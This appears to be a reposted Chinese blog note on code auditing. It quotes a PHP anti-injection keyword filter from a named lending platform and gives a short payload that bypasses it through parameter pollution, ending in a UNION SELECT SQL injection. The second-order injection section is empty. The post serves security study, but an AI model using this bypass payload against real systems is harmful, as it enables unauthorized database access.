码迷,mamicode.com
首页 > 其他好文 > 详细

跟着师傅学代码审计(二)

时间:2016-06-01 00:13:34      阅读:260      评论:0      收藏:0      [点我收藏+]

标签:

一、注入

1、绕过WAF

(1)、贷齐乐系统最新版SQL注入(无需登录绕过WAF可union select跨表查询)

防注入类,GET/POST/REQUEST/COOKIE等请求都将经过这个类过滤~

$check= eregi(select|insert|update|delete|\‘|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile, $str);

$string = str_replace(array(&, ", <, >,(,)), array(&amp;, &quot;, &lt;, &gt;,,), $string);

利用hpp+php小特性,绕过EXP:

user_id=-1 UnioN sElECt 1,2,3&user.id= 123123

(2)

 

2、二次注入

 

跟着师傅学代码审计(二)

标签:

原文地址:http://www.cnblogs.com/tyomcat/p/5548105.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!